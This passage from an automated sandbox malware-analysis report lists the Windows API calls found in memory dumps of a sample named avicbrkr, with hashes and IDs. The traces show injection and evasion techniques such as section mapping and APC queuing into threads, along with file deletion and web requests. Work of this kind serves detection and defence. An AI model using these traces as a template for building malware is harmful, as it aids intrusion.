                        • Part of subcall function 0038DB9C: memcpy.NTDLL(0039D3CC,?,00000018,0037D9BD,?,?,00000000,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0038DBAE
                        • Part of subcall function 0037D752: GetSystemTimeAsFileTime.KERNEL32(?,00000000,0037D9CC,?,pnls,?,00000001,0037D9CC), ref: 0037D786
                        • Part of subcall function 0037D752: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037D7E6
                        • Part of subcall function 0037B703: GetModuleHandleA.KERNEL32(0039E88E,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037B742
                        • Part of subcall function 0037B703: CreateThread.KERNEL32(00000000,00000000,00376E94,00000000,00000000,?), ref: 0037B777
                        • Part of subcall function 0037B703: CloseHandle.KERNEL32(00000000), ref: 0037B782
                        • Part of subcall function 0037B703: GetLastError.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037B78A
                        • Part of subcall function 00373F05: RegQueryValueExA.KERNEL32(?,Client,00000000,?,0039C06C,0000005C,00000001,?,00000000,00000000,00000000,?,00000001,0037D9E0,?,0000005C), ref: 00373F50
                        • Part of subcall function 00373F05: RegCloseKey.ADVAPI32(?,?,00000001,0037D9E0,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 00373F9D
                        • Part of subcall function 00373F05: wsprintfA.USER32 ref: 00374011
                      • RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0037D9E9
                      • LoadLibraryA.KERNEL32(0039E000), ref: 0037DA84
                        • Part of subcall function 0037C19E: CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0039D2D8,00000001), ref: 0037C1C5
                        • Part of subcall function 0037C19E: CreateThread.KERNEL32(00000000,00000000,0037BE82,00000000,00000000,0000005C), ref: 0037C1DF
                        • Part of subcall function 0037C19E: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037C1F0
                        • Part of subcall function 0037C19E: CloseHandle.KERNEL32(00000000), ref: 0037C1F9
                        • Part of subcall function 0037C19E: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037C201
                        • Part of subcall function 00371E8C: InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371E98
                        • Part of subcall function 00371E8C: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00371EB3
                        • Part of subcall function 00371E8C: lstrcpy.KERNEL32(00000000,0039E520), ref: 00371ED4
                        • Part of subcall function 00371E8C: HeapFree.KERNEL32(00000000,00000000,?), ref: 00371EF5
                        • Part of subcall function 0037B5CD: HeapFree.KERNEL32(00000000,?,00000000), ref: 0037B634
                      • wsprintfA.USER32 ref: 0037DB25
                        • Part of subcall function 0037D383: StrChrA.SHLWAPI(?,00000020), ref: 0037D3F3
                        • Part of subcall function 0037D383: HeapFree.KERNEL32(00000000,?,00000125), ref: 0037D43B
                        • Part of subcall function 0038C47E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0039D314,00004A28,0038BC8B,0038BCA3,0037DA5A,?,0000005C,?,0037DDEC,?), ref: 0038CCD5
                        • Part of subcall function 0038C47E: CreateThread.KERNEL32(00000000,00000000,0038CAE5,0039D370,00000000,0039D374), ref: 0038CCF6
                        • Part of subcall function 0038C47E: GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0038CD05
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCreateErrorHandleLast$Close$Free$Thread$ModuleProcessQueryTimewsprintf$EventExchangeFileInformationInterlockedLibraryLoadMutexNamedOpenPipeSystemValueVersionlstrcpymemcpymemset
                      • String ID: gU9
                      • API String ID: 2539185180-705701294
                      • Opcode ID: cb2a260ef1b0de75e9c4ba086c5a263ac535d19bdec2eedc1348aa5790934934
                      • Instruction ID: 477f24bca4b02d6ccf970bd73cc3fd74e1bc7e7fe949ed65a929fc225b3f4eed
                      • Opcode Fuzzy Hash: cb2a260ef1b0de75e9c4ba086c5a263ac535d19bdec2eedc1348aa5790934934
                      • Instruction Fuzzy Hash: DB91C170605215AFC733EF65EC8A92ABBBCEF45B40F12881BF149D7260D77A9841CB91
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00387121, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 234filesynchronizationCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 003871C1
                      • FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                      • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                      • FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                      • WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                      • FindClose.KERNEL32(?), ref: 003873E2
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$File$CloseCriticalFirstHeapNextObjectSectionSingleWaitmemset$AllocateEnterFreeLeavewcscpy
                      • String ID: R9
                      • API String ID: 2408353863-134138977
                      • Opcode ID: fba8474cab84aa07418248681570738b73a7a6731ccf09bc16691463138de926
                      • Instruction ID: f07c87a0d59e3e6794e912fed6c4806385b066c27e44bb69ed203780f093a332
                      • Opcode Fuzzy Hash: fba8474cab84aa07418248681570738b73a7a6731ccf09bc16691463138de926
                      • Instruction Fuzzy Hash: D0817E71518305AFC762AF68DC84A1BBBEAFF88300F154C69F88996262D775D805CB92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038CF9B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 205nativeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038DEC8: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 0038DF23
                        • Part of subcall function 0038DEC8: memset.NTDLL ref: 0038DF48
                        • Part of subcall function 0038DEC8: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DF64
                        • Part of subcall function 0038DEC8: NtClose.NTDLL(?), ref: 0038DF78
                      • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                      • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CE4F: GetModuleHandleA.KERNEL32(0039E8AE,00083097,?,0038D17F,?,?,00000000), ref: 0038CE82
                        • Part of subcall function 0038CE4F: memcpy.NTDLL(0039F155,0039D3E4,00000018,0039F133,0039F155,0039F14A,?,0038D17F,?,?,00000000), ref: 0038CEED
                      • memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 00388E34: memset.NTDLL ref: 00388E53
                        • Part of subcall function 0038CEFC: memcpy.NTDLL(?,0039D3FC,00000018,?,0039F133,?,0039F155,?,0039F14A,?,0038D177,?,?,?,00000000), ref: 0038CF8D
                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                      • CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                      • memset.NTDLL ref: 0038D1F7
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 0038DE89: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0038DEB6
                        • Part of subcall function 0038DE89: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038DEBD
                        • Part of subcall function 0038DF87: memcpy.NTDLL(0038DC2F,0038DC37,66986600,00083097,?,?,?,?,00000000), ref: 0038DFF5
                        • Part of subcall function 0038DF87: memcpy.NTDLL(00000000,?,66986600,00083097,?,?,?,?,00000000), ref: 0038E012
                        • Part of subcall function 0038DF87: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 0038E054
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$ErrorSectionStatusmemset$CloseHandleHeapView$AllocateCreateFreeModuleUnmap
                      • String ID: pnls
                      • API String ID: 17049359-141991303
                      • Opcode ID: 7e69ea4089918cfac144c48057f68d2d8ae1688c864d5e76d0fa33a3cfcbdcad
                      • Instruction ID: 1e0a9feaea0fd0114e42aa2e0424c5f21b6b4eaab25e569a8a0e2a02a176ba4d
                      • Opcode Fuzzy Hash: 7e69ea4089918cfac144c48057f68d2d8ae1688c864d5e76d0fa33a3cfcbdcad
                      • Instruction Fuzzy Hash: B4814EB1900309DFDF22EFA8CC85AAEBBB5FF04304F1545A9E511AB291D731EA44DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038F3B0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 97memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00373F6C), ref: 0038F3ED
                      • HeapFree.KERNEL32(00000000,?), ref: 0038F423
                      • GetComputerNameW.KERNEL32(00000000,00373F6C), ref: 0038F431
                      • RtlAllocateHeap.NTDLL(00000000,00373F6C), ref: 0038F448
                      • GetComputerNameW.KERNEL32(00000000,00373F6C), ref: 0038F459
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0038F47F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateComputerFreeName
                      • String ID: Client$[[9
                      • API String ID: 3439771632-1294312253
                      • Opcode ID: a4199388552ef7db5850ad4d1334752822276f566e6a6693b9d22e34f0c38ef6
                      • Instruction ID: f71fe17704777c0e16083d03429a90fb91219123944cd4bef4c9e8826aaf2aa8
                      • Opcode Fuzzy Hash: a4199388552ef7db5850ad4d1334752822276f566e6a6693b9d22e34f0c38ef6
                      • Instruction Fuzzy Hash: C83105B6910209EFDB02EFB5DD858AEBBFDEB48300B1184AAE501D3210E735EE419B10
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00390600, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85registrylibraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000002,003994E4,00000001), ref: 0039061B
                      • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 003906CC
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • LoadLibraryA.KERNEL32(00000000), ref: 00390669
                      • GetProcAddress.KERNEL32(00000000,0039F2BE,?,00000008,?,00000001), ref: 0039067B
                      • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0039069A
                      • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 003906AC
                      • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 003906B4
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFreeHeapLastLibrary$AddressAllocateCloseLoadOpenProc
                      • String ID: o[9
                      • API String ID: 2182076089-3128973720
                      • Opcode ID: d70d5226a6fb3b380f4609126c0411f3cd274c0a240fe756430aa71abd69626f
                      • Instruction ID: c02349294015d533819e16c20c6b151e90b6358c4c40d6ed5b722c555b01d33d
                      • Opcode Fuzzy Hash: d70d5226a6fb3b380f4609126c0411f3cd274c0a240fe756430aa71abd69626f
                      • Instruction Fuzzy Hash: BB217FB2904228BFCF236BA99C49CAEBF7CEBC5750F114166F905A2261D7324E50DB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00631C29, Relevance: 10.7, APIs: 7, Instructions: 198nativeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0063271B: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 00632776
                        • Part of subcall function 0063271B: memset.NTDLL ref: 0063279B
                        • Part of subcall function 0063271B: RtlNtStatusToDosError.NTDLL(00000000), ref: 006327B7
                        • Part of subcall function 0063271B: NtClose.NTDLL(?), ref: 006327CB
                      • memcpy.NTDLL(?,CCCCFEEB,?,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631D5F
                      • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,00632386,?,00632386,00632386,?,?,?,?,00000000), ref: 00631DB0
                        • Part of subcall function 00631ADD: GetModuleHandleA.KERNEL32(006380DB,?,CCCCFEEB,00631E0D,?,?,?,00000000), ref: 00631B10
                        • Part of subcall function 00631ADD: memcpy.NTDLL(?,006375E0,00000018,0063845C,00638400,00638451), ref: 00631B7B
                      • memcpy.NTDLL(?,00632486,00000800,?,?,?,00000000), ref: 00631E20
                        • Part of subcall function 006338AE: memset.NTDLL ref: 006338CD
                        • Part of subcall function 00631B8A: memcpy.NTDLL(CCCCFEEB,006375F8,00000018,CCCCFEEB,0063845C,CCCCFEEB,00638400,CCCCFEEB,00638451,CCCCFEEB,00631E05,?,00632386,?,?,00000000), ref: 00631C1B
                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00631E4B
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 00631E52
                      • CloseHandle.KERNEL32(00000000), ref: 00631E61
                      • memset.NTDLL ref: 00631E75
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                        • Part of subcall function 006326DC: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00632709
                        • Part of subcall function 006326DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00632710
                        • Part of subcall function 006327DA: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 00632848
                        • Part of subcall function 006327DA: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 00632865
                        • Part of subcall function 006327DA: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 006328A7
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$ErrorSectionStatusmemset$CloseHandleHeapView$AllocateCreateFreeModuleUnmap
                      • String ID:
                      • API String ID: 17049359-0
                      • Opcode ID: 74d5ceb936e7aa8e48ea4623d0794fb438fe845dc45f0238a9a7531a5a2460ec
                      • Instruction ID: b0acc1177a07dfd3c90fca9272c326804635b6b7046c9c88565e4183b1b60b97
                      • Opcode Fuzzy Hash: 74d5ceb936e7aa8e48ea4623d0794fb438fe845dc45f0238a9a7531a5a2460ec
                      • Instruction Fuzzy Hash: 86813BB0D0060AEFCB11DF98C885AEEBBB6FF05304F144569E911AB351D735AA44DB94
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037B652, Relevance: 10.6, APIs: 7, Instructions: 65threadprocesslibraryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0037B684
                      • GetModuleHandleA.KERNEL32(0039E01D,0039F030,00000004,00000000,00000000,00000000,00000000), ref: 0037B69B
                      • GetProcAddress.KERNEL32(00000000), ref: 0037B6A2
                      • Thread32First.KERNEL32(?,0000001C), ref: 0037B6B2
                      • OpenThread.KERNEL32(001F03FF,00000000,00000000,?,0000001C), ref: 0037B6CD
                      • QueueUserAPC.KERNEL32(0000005C,00000000,00000000), ref: 0037B6DE
                      • Thread32Next.KERNEL32(?,0000001C), ref: 0037B6EE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Thread32$AddressCreateFirstHandleModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                      • String ID:
                      • API String ID: 190292596-0
                      • Opcode ID: 115c196f44d43cfb2faaa8e18839e9ca4f9a8072e561f4434f957d0c83c8fb9e
                      • Instruction ID: 350d73964c993811327893ec8d1f99fcc01ea6b76de9dba056540ae1c83045ec
                      • Opcode Fuzzy Hash: 115c196f44d43cfb2faaa8e18839e9ca4f9a8072e561f4434f957d0c83c8fb9e
                      • Instruction Fuzzy Hash: 9A118B72900108EFDF13AFA4DC85EAEBB7CFB08355F004126FA05A61A0D7758D918BA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00386B82, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00386C2D
                      • FlushFileBuffers.KERNEL32(00000000), ref: 00386C9A
                      • GetLastError.KERNEL32(?,00000000,00000000), ref: 00386CA4
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: BuffersErrorFileFlushLastmemset
                      • String ID: K$P
                      • API String ID: 3817869962-420285281
                      • Opcode ID: 5249a4821e8631d228a0f16cb47993e871c11d6fe5a5d3e497827e834bda585a
                      • Instruction ID: e03b023dfdc23a42408a926453bccce611e10efb3de1049787f498a54b4c5de7
                      • Opcode Fuzzy Hash: 5249a4821e8631d228a0f16cb47993e871c11d6fe5a5d3e497827e834bda585a
                      • Instruction Fuzzy Hash: E7419F70A007059FDB22DFA5C98566EBBF5FF18B00F55486DE48693A81E734A908DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00383C19, Relevance: 7.9, APIs: 6, Instructions: 401COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: 664bb23cc76c344d041eaa7c6ad639a7932c0023f778a0ab912cc1f37b02c0fa
                      • Instruction ID: 79b36cc67bf16bdddcd87ad0c63db15d71e48a49261bf86d14c89d0c4df94612
                      • Opcode Fuzzy Hash: 664bb23cc76c344d041eaa7c6ad639a7932c0023f778a0ab912cc1f37b02c0fa
                      • Instruction Fuzzy Hash: F0F1F231900799CFCB32DF68C9846AABBF4FF51700F2449ADD6D796B81D232AA45CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003874A1, Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • FindFirstFileW.KERNEL32(?,00000000), ref: 0038751B
                      • RemoveDirectoryW.KERNEL32(?), ref: 00387595
                      • DeleteFileW.KERNEL32(?), ref: 003875A0
                      • FindNextFileW.KERNEL32(?,00000000), ref: 003875B3
                      • GetLastError.KERNEL32 ref: 003875CE
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$FindHeap$AllocateDeleteDirectoryErrorFirstFreeLastNextRemove
                      • String ID:
                      • API String ID: 1296863077-0
                      • Opcode ID: d720247ff6f37343dad57e7a8a4cccaa4ae3530149b463008913aae05dcbef8a
                      • Instruction ID: 0851a8512447ebbfb2844a0536a0605c19c46ae1c2f688866d20945d32c0511e
                      • Opcode Fuzzy Hash: d720247ff6f37343dad57e7a8a4cccaa4ae3530149b463008913aae05dcbef8a
                      • Instruction Fuzzy Hash: 81414E7280430AEBCF13AFA4CC49AAEBF7AFF05740F2084A5E505A61A1DB75CA54DB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037C19E, Relevance: 7.5, APIs: 5, Instructions: 44pipethreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0039D2D8,00000001), ref: 0037C1C5
                      • CreateThread.KERNEL32(00000000,00000000,0037BE82,00000000,00000000,0000005C), ref: 0037C1DF
                      • GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037C1F0
                      • CloseHandle.KERNEL32(00000000), ref: 0037C1F9
                      • GetLastError.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037C201
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CreateErrorLast$CloseHandleNamedPipeThread
                      • String ID:
                      • API String ID: 2018970776-0
                      • Opcode ID: eedd26a3333fc8b74ebb5168b38ffccfc9f5f5836eec7cabd3d57f7f50822659
                      • Instruction ID: 626ae0edcc6236c227bf881b473406887fcf862ea45c1f5bb5a5ad31df0bd474
                      • Opcode Fuzzy Hash: eedd26a3333fc8b74ebb5168b38ffccfc9f5f5836eec7cabd3d57f7f50822659
                      • Instruction Fuzzy Hash: F3F0F671210140BBD733576AEC0DEAB7B6CDBC6B60F244526FE1AD22E0E6758D41C6B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038F8C5, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00389807: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0038F8D5,00000008,00000000,00000000,?,?,0038FB66,?,?,00000001,00000000,00000000), ref: 00389810
                        • Part of subcall function 00389807: mbstowcs.NTDLL ref: 00389837
                        • Part of subcall function 00389807: memset.NTDLL ref: 00389849
                      • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,0038FB66,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 0038F8E1
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,0038FB66,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 0038FA12
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFreeHeapLastVersionlstrlenmbstowcsmemset
                      • String ID: GET$POST
                      • API String ID: 1057714926-3192705859
                      • Opcode ID: 555ede2a1dc8ddb285a8de33cdd424ac0cfdde28fc797eb8a0e256a19fd429ca
                      • Instruction ID: 0e1b979b00c125bda4bb9a3f03abc47294ce62ddb22e72fd2b9cda492c5fbf68
                      • Opcode Fuzzy Hash: 555ede2a1dc8ddb285a8de33cdd424ac0cfdde28fc797eb8a0e256a19fd429ca
                      • Instruction Fuzzy Hash: 5441CE71500308BFDB32BF65DC48EAB7BB9EB84740F124929F646DA091E771D984DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00391663, Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,?,0039F9E0), ref: 003916E1
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • FindClose.KERNEL32(00000002), ref: 00391779
                        • Part of subcall function 003915BE: lstrlenW.KERNEL32(00000000,00000000,003970EC,003970C0,?,?,?,00391753,?,00000000,?), ref: 003915CE
                        • Part of subcall function 003915BE: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,00391753,?,00000000,?), ref: 003915F0
                        • Part of subcall function 003915BE: lstrcpyW.KERNEL32(00000000,00000000), ref: 0039161C
                        • Part of subcall function 003915BE: lstrcatW.KERNEL32(00000000,0039FA5C), ref: 00391628
                      • FindNextFileW.KERNEL32(?,00000010), ref: 0039176B
                      • FreeLibrary.KERNEL32(?), ref: 0039178B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003911F6: lstrlenW.KERNEL32(?,00000000,?,?,?,003916D0,?,0039F9E0), ref: 00391203
                        • Part of subcall function 003911F6: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,003916D0,?,0039F9E0), ref: 0039122C
                        • Part of subcall function 003911F6: LoadLibraryW.KERNEL32(-0000FFFE), ref: 0039126F
                        • Part of subcall function 003911F6: FreeLibrary.KERNEL32(00000000,?,?,?,003916D0,?,0039F9E0), ref: 00391301
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FindFreeLibrary$FileHeaplstrlen$AllocateByteCharCloseCurrentDirectoryFirstLoadMultiNextWidelstrcatlstrcpy
                      • String ID:
                      • API String ID: 1924547645-0
                      • Opcode ID: cbe645e6b8ad818fed74e19c82c8006049c2a83bbc7e16882d52655418dff3f7
                      • Instruction ID: 760ce08c4ab57a11c598a196f305ad4e742ae728b4f2543a3bd4efa57cae9be2
                      • Opcode Fuzzy Hash: cbe645e6b8ad818fed74e19c82c8006049c2a83bbc7e16882d52655418dff3f7
                      • Instruction Fuzzy Hash: 07314E725183029FDB22AF60DC85A2FBBE9FF84B54F054D2EF494A2150D731D9198B92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00632A7B, Relevance: 6.1, APIs: 4, Instructions: 81nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtOpenProcess.NTDLL(0063618C,00000400,?,00637614), ref: 00632AC3
                      • NtOpenProcessToken.NTDLL(0063618C,00000008,0000000C), ref: 00632AD6
                      • NtClose.NTDLL(0063618C), ref: 00632B36
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      • NtClose.NTDLL(0000000C), ref: 00632B2D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseHeapOpenProcess$AllocateFreeToken
                      • String ID:
                      • API String ID: 3496914122-0
                      • Opcode ID: 8b0abf584ecf3a86951cd62dce1698482e4d8841cad59d0c3beefcf1c78b1b32
                      • Instruction ID: 830bde782f3235fc6c205efbfa7bf44c6d3de7ef4423f44e831972028b352170
                      • Opcode Fuzzy Hash: 8b0abf584ecf3a86951cd62dce1698482e4d8841cad59d0c3beefcf1c78b1b32
                      • Instruction Fuzzy Hash: A42139B2A0021DBBDB019F94CC45EDEBFBEEF09744F104066F605E6121D7B19A449BE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0063271B, Relevance: 6.1, APIs: 4, Instructions: 79nativeCOMMON
                      Download Yara Rule
                      APIs
